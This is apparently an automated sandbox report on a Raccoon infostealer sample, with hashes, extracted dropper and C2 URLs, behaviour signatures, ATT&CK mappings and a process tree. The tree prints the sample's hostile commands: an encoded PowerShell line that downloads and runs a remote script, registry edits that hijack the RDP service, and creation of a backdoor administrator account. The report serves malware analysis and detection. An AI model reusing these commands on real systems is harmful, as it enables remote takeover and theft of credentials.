Analysis

  • max time kernel
    88s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02-06-2021 18:08

General

  • Target

    f13060a6789449453b7d4a4b815cc80d.exe

  • Size

    567KB

  • MD5

    f13060a6789449453b7d4a4b815cc80d

  • SHA1

    77d3b0a202710d93c660aca624a63a97811b8f9e

  • SHA256

    2b9b67b6e376ed8db68a8b219209981c865a2a26a4c4cd926b79cf2fddb57d54

  • SHA512

    78ed128be390ff896fb83b4cac8b30db20258f985d8f86d61f64da19cbd0bd8e2891a46fbdee1ad09e6d99fda697dfb12650deb1c628979b3a4133c438313b55

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

raccoon

Botnet

e46634757936706c1ff491585768dd6fe231db30

Attributes
  • url4cnc

    https://tttttt.me/jdiamond13

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe
    "C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4048
    • C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe
      "C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3340
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4339.tmp" "c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMP"
            5⤵
              PID:1596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2416
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2984
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3936
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            4⤵
              PID:2932
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              4⤵
              • Modifies registry key
              PID:3652
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              4⤵
                PID:3868
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3904
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  5⤵
                    PID:3872
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1632
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1564
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3960
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
                        7⤵
                          PID:2388
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4012
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1512
                      • C:\Windows\system32\net.exe
                        net start TermService
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3936
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start TermService
                          7⤵
                            PID:1328
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                      4⤵
                        PID:4312
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                        4⤵
                          PID:4328
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\f13060a6789449453b7d4a4b815cc80d.exe"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3744
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        3⤵
                        • Delays execution with timeout.exe
                        PID:3408
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3896
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3640
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:1644
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc kYvjN912 /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2024
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc kYvjN912 /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1084
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc kYvjN912 /add
                          3⤵
                            PID:3864
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2408
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3344
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:3960
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:912
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4076
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
                              3⤵
                                PID:184
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2864
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              2⤵
                                PID:3960
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                  3⤵
                                    PID:2188
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user wgautilacc kYvjN912
                                1⤵
                                  PID:3964
                                  • C:\Windows\system32\net.exe
                                    net.exe user wgautilacc kYvjN912
                                    2⤵
                                      PID:3872
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user wgautilacc kYvjN912
                                        3⤵
                                          PID:1428
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C wmic path win32_VideoController get name
                                      1⤵
                                        PID:1172
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic path win32_VideoController get name
                                          2⤵
                                          • Modifies data under HKEY_USERS
                                          PID:1656
                                      • C:\Windows\System32\cmd.exe
                                        cmd.exe /C wmic CPU get NAME
                                        1⤵
                                          PID:1428
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic CPU get NAME
                                            2⤵
                                            • Modifies data under HKEY_USERS
                                            PID:912
                                        • C:\Windows\System32\cmd.exe
                                          cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          1⤵
                                            PID:1656
                                            • C:\Windows\system32\cmd.exe
                                              cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              2⤵
                                                PID:3652
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                  3⤵
                                                  • Blocklisted process makes network request
                                                  • Drops file in Program Files directory
                                                  • Drops file in Windows directory
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:3872
                                            • C:\Windows\System32\cmd.exe
                                              cmd.exe /C net user wgautilacc 1234
                                              1⤵
                                                PID:4196
                                                • C:\Windows\system32\net.exe
                                                  net user wgautilacc 1234
                                                  2⤵
                                                    PID:4236
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user wgautilacc 1234
                                                      3⤵
                                                        PID:4256

                                                  Network

                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                  Persistence

                                                  Account Manipulation

                                                  1
                                                  T1098

                                                  Registry Run Keys / Startup Folder

                                                  1
                                                  T1060

                                                  Defense Evasion

                                                  Modify Registry

                                                  2
                                                  T1112

                                                  Credential Access

                                                  Credentials in Files

                                                  1
                                                  T1081

                                                  Discovery

                                                  Query Registry

                                                  1
                                                  T1012

                                                  System Information Discovery

                                                  1
                                                  T1082

                                                  Lateral Movement

                                                  Remote Desktop Protocol

                                                  1
                                                  T1076

                                                  Collection

                                                  Data from Local System

                                                  1
                                                  T1005

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
                                                    MD5

                                                    4d0cb7fa714bb6b8b113319c5f37734d

                                                    SHA1

                                                    78fb1052d8fa35592e0f6103378658478c8d1385

                                                    SHA256

                                                    469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845

                                                    SHA512

                                                    b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c

                                                  • C:\Users\Admin\AppData\Local\Temp\RES4339.tmp
                                                    MD5

                                                    50b20b99b5a4a7aadfd05349dab0f94f

                                                    SHA1

                                                    b97b15b279f63766b9158caaca1a66e476793c2b

                                                    SHA256

                                                    40344e2f1ed1104917e5e9d96b33e33e6cd67245a399ff43dc5947ccd38f65c4

                                                    SHA512

                                                    de6fb7ba2c8b40f20217c6889ce9785491ae0b2506967c653bf8898e9bc3d272e8a0d399d330e13ba65a939a13b4b0edd15e9e98e4566b297e19a76da0883d84

                                                  • C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe
                                                    MD5

                                                    c2ac724339045f253306ae9ab38cbf4f

                                                    SHA1

                                                    c6abd5edb40444ce3fbc8564051545161cd85495

                                                    SHA256

                                                    d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a

                                                    SHA512

                                                    b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58

                                                  • C:\Users\Admin\AppData\Local\Temp\ZyKUG6PQzM.exe
                                                    MD5

                                                    c2ac724339045f253306ae9ab38cbf4f

                                                    SHA1

                                                    c6abd5edb40444ce3fbc8564051545161cd85495

                                                    SHA256

                                                    d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a

                                                    SHA512

                                                    b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58

                                                  • C:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.dll
                                                    MD5

                                                    df58066035d24e61dbb826ddb3470a96

                                                    SHA1

                                                    3ab15ccac9182d9ed8c0b305203d6502ca8993b5

                                                    SHA256

                                                    180ac07089abb4e253efe49e437667b58b5e2ca8af41c6b3ae1751f97aa0de53

                                                    SHA512

                                                    10f6a13ea1109f4e41fe58597f2c8fcd547ce03878d3a3297a9a04ad6d03144e2c5893e4f774303ae5f95fa196bb20cd1cad9ff0df99c7471924b4dd8a4ee736

                                                  • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                    MD5

                                                    065cc96fec70546c9f195f703e4d657b

                                                    SHA1

                                                    9da24636d8fd3de61f46ff7282640d3fa27d6b45

                                                    SHA256

                                                    cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3

                                                    SHA512

                                                    a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0

                                                  • \??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\CSC4A9A379BCE29450F98C1A91E8A88D1F.TMP
                                                    MD5

                                                    62374593a8c844fe79522ea67f88c21e

                                                    SHA1

                                                    3cc6b749a918c0f3f22f0d97940b75e9f3ef73b0

                                                    SHA256

                                                    6471176eb4782137b2d2b397c19db2888a7d1dfd65e2976388c3739b88c9aebf

                                                    SHA512

                                                    36f9db7a333765b648f43f037ed9d064ce00ec04a464831ef105c870196645b32bccd113644eb2b91f2302955ec511c39b3e87ebd7d920b9f51db69d4f3b7fa6

                                                  • \??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.0.cs
                                                    MD5

                                                    df390bc8a088b51d27253fed32186361

                                                    SHA1

                                                    69e6a59300fc04ef5ab53cbe061b8b2aefe375a4

                                                    SHA256

                                                    4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f

                                                    SHA512

                                                    4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8

                                                  • \??\c:\Users\Admin\AppData\Local\Temp\nj0rhsok\nj0rhsok.cmdline
                                                    MD5

                                                    e9e262d6d0b29d1dd029f21bc91c2b81

                                                    SHA1

                                                    ba9ceab757c045cf6243fdbbc8fa922028b1ab45

                                                    SHA256

                                                    005397270f3027adb53af04a607fe653e97f930138b1cc3b6fc306be64b5921b

                                                    SHA512

                                                    c1cfb82ec8b5e404db14d51a2c690b4eddb859e949add6edec5fe77c1ac056a721de6b750cbe40447231b0cb68ad2c7303dd27cce313b28d59cb1240162730c8

                                                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                                                    MD5

                                                    f964811b68f9f1487c2b41e1aef576ce

                                                    SHA1

                                                    b423959793f14b1416bc3b7051bed58a1034025f

                                                    SHA256

                                                    83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                                                    SHA512

                                                    565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                                                  • \Windows\Branding\mediasrv.png
                                                    MD5

                                                    ee8186ae8d2615ee4a859007556227ec

                                                    SHA1

                                                    0125a0caaf2ff3da1266f1893cf051ddca6460fa

                                                    SHA256

                                                    96de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f

                                                    SHA512

                                                    2eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612

                                                  • \Windows\Branding\mediasvc.png
                                                    MD5

                                                    7a8bf878d6438e28822cb499cb7da107

                                                    SHA1

                                                    36cbc7c1b2da094b773614d251704e4c2bb0e88e

                                                    SHA256

                                                    9aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63

                                                    SHA512

                                                    6c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee

                                                  • memory/184-239-0x0000000000000000-mapping.dmp
                                                  • memory/912-245-0x0000000000000000-mapping.dmp
                                                  • memory/1084-234-0x0000000000000000-mapping.dmp
                                                  • memory/1328-229-0x0000000000000000-mapping.dmp
                                                  • memory/1428-243-0x0000000000000000-mapping.dmp
                                                  • memory/1512-227-0x0000000000000000-mapping.dmp
                                                  • memory/1564-223-0x0000000000000000-mapping.dmp
                                                  • memory/1596-149-0x0000000000000000-mapping.dmp
                                                  • memory/1632-222-0x0000000000000000-mapping.dmp
                                                  • memory/1644-233-0x0000000000000000-mapping.dmp
                                                  • memory/1656-244-0x0000000000000000-mapping.dmp
                                                  • memory/2128-124-0x00000214FF960000-0x00000214FF962000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2128-127-0x00000214FF966000-0x00000214FF967000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2128-126-0x00000214FF965000-0x00000214FF966000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2128-125-0x00000214FF963000-0x00000214FF965000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2128-122-0x0000021499400000-0x0000021499821000-memory.dmp
                                                    Filesize

                                                    4.1MB

                                                  • memory/2128-117-0x0000000000000000-mapping.dmp
                                                  • memory/2168-128-0x0000000000000000-mapping.dmp
                                                  • memory/2168-160-0x0000027FAF1C0000-0x0000027FAF1C1000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2168-133-0x0000027F96350000-0x0000027F96351000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2168-136-0x0000027FAEA00000-0x0000027FAEA01000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2168-143-0x0000027FAE7F0000-0x0000027FAE7F2000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2168-161-0x0000027FAF550000-0x0000027FAF551000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2168-144-0x0000027FAE7F3000-0x0000027FAE7F5000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2168-216-0x0000027FAE7F8000-0x0000027FAE7F9000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2168-145-0x0000027FAE7F6000-0x0000027FAE7F8000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2168-153-0x0000027F963A0000-0x0000027F963A1000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/2188-241-0x0000000000000000-mapping.dmp
                                                  • memory/2388-225-0x0000000000000000-mapping.dmp
                                                  • memory/2416-206-0x000001789B0D8000-0x000001789B0DA000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2416-205-0x000001789B0D6000-0x000001789B0D8000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2416-177-0x000001789B0D0000-0x000001789B0D2000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2416-178-0x000001789B0D3000-0x000001789B0D5000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2416-168-0x0000000000000000-mapping.dmp
                                                  • memory/2932-217-0x0000000000000000-mapping.dmp
                                                  • memory/2984-209-0x00000215370C0000-0x00000215370C2000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2984-211-0x00000215370C6000-0x00000215370C8000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2984-210-0x00000215370C3000-0x00000215370C5000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/2984-208-0x0000000000000000-mapping.dmp
                                                  • memory/3340-146-0x0000000000000000-mapping.dmp
                                                  • memory/3344-236-0x0000000000000000-mapping.dmp
                                                  • memory/3408-121-0x0000000000000000-mapping.dmp
                                                  • memory/3640-232-0x0000000000000000-mapping.dmp
                                                  • memory/3652-246-0x0000000000000000-mapping.dmp
                                                  • memory/3652-218-0x0000000000000000-mapping.dmp
                                                  • memory/3744-120-0x0000000000000000-mapping.dmp
                                                  • memory/3864-235-0x0000000000000000-mapping.dmp
                                                  • memory/3868-219-0x0000000000000000-mapping.dmp
                                                  • memory/3872-249-0x000001BCEF833000-0x000001BCEF835000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/3872-251-0x000001BCEF838000-0x000001BCEF839000-memory.dmp
                                                    Filesize

                                                    4KB

                                                  • memory/3872-247-0x0000000000000000-mapping.dmp
                                                  • memory/3872-242-0x0000000000000000-mapping.dmp
                                                  • memory/3872-221-0x0000000000000000-mapping.dmp
                                                  • memory/3872-250-0x000001BCEF836000-0x000001BCEF838000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/3872-248-0x000001BCEF830000-0x000001BCEF832000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/3904-220-0x0000000000000000-mapping.dmp
                                                  • memory/3936-213-0x00000272FBB90000-0x00000272FBB92000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/3936-212-0x0000000000000000-mapping.dmp
                                                  • memory/3936-228-0x0000000000000000-mapping.dmp
                                                  • memory/3936-215-0x00000272FBB96000-0x00000272FBB98000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/3936-214-0x00000272FBB93000-0x00000272FBB95000-memory.dmp
                                                    Filesize

                                                    8KB

                                                  • memory/3960-240-0x0000000000000000-mapping.dmp
                                                  • memory/3960-237-0x0000000000000000-mapping.dmp
                                                  • memory/3960-224-0x0000000000000000-mapping.dmp
                                                  • memory/4012-226-0x0000000000000000-mapping.dmp
                                                  • memory/4048-115-0x0000000000400000-0x0000000000496000-memory.dmp
                                                    Filesize

                                                    600KB

                                                  • memory/4048-114-0x0000000002110000-0x00000000021A1000-memory.dmp
                                                    Filesize

                                                    580KB

                                                  • memory/4076-238-0x0000000000000000-mapping.dmp
                                                  • memory/4236-252-0x0000000000000000-mapping.dmp
                                                  • memory/4256-253-0x0000000000000000-mapping.dmp
                                                  • memory/4312-254-0x0000000000000000-mapping.dmp
                                                  • memory/4328-255-0x0000000000000000-mapping.dmp